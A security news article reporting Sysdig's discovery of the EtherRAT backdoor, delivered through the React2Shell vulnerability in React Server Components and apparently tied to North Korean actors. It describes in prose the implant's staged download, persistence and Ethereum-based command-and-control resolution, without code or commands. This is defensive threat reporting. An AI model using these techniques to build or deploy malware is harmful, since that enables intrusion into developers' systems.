**New EtherRAT Backdoor Surfaces in React2Shell Attacks Tied to North Korea**

The cybersecurity community has been put on high alert as researchers from Sysdig have discovered a new backdoor, dubbed EtherRAT, being used in attacks tied to North Korea. The discovery comes just two days after the disclosure of the critical React2Shell flaw (CVE-2025-55182), which is being exploited by threat actors to deploy the newly discovered remote access trojan.

North Korea-linked hackers are likely using the React2Shell vulnerability to deliver EtherRAT, a previously unknown implant that combines techniques from multiple past campaigns. The attackers' payloads commonly include the BeaverTail and OtterCookie infostealers and the InvisibleFerret RAT, and they target software developers on Windows, Linux, and macOS.

The Contagious Interview campaign, active since November 2023 and linked to North Korea, is believed to be behind the attacks. The attackers pose as recruiters on platforms like LinkedIn and use social engineering tactics, including fake job interviews and trojanized demo projects, to deliver malware.

**What is React2Shell?**

React2Shell is a vulnerability in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The flaw allows for pre-authentication remote code execution without proper safety checks.

**What is EtherRAT?**

EtherRAT is a new remote access trojan that leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org. The implant operates in four stages, starting with a base64 command that abuses React2Shell and repeatedly tries to download a script using curl, wget, or python3.

Once the download succeeds, it runs the script and moves to s.sh, which creates a hidden directory, fetches a legitimate Node.js build from nodejs.org, drops an encrypted payload and an obfuscated dropper, launches them in the background, and wipes itself to reduce evidence. The dropper decrypts the payload with AES-256-CBC, generates a bot ID, stores it in a state file, and starts the main implant.

**How Does EtherRAT Establish Persistence?**

EtherRAT uses Ethereum smart contracts to locate its real C2, querying nine RPC endpoints and choosing the majority response for resilience. This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node.

**What are the Indicators of Compromise (IoCs)?**

The report published by Sysdig includes Indicators of Compromise (IoCs) that can be used to detect and prevent attacks. The IoCs include network traffic patterns, system calls, and other artifacts that can help defenders identify and mitigate the threat.

**Conclusion**

The discovery of EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations. The combination of blockchain-based C2, aggressive multi-vector persistence, and a payload update mechanism demonstrates a level of sophistication not previously observed in React2Shell payloads.

The overlap with DPRK "Contagious Interview" tooling raises important questions about attribution and tool-sharing between threat actors. Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods.

Stay tuned for further updates on this developing story, and follow me on Twitter: @securityaffairs and Facebook and Mastodon for the latest cybersecurity news and analysis.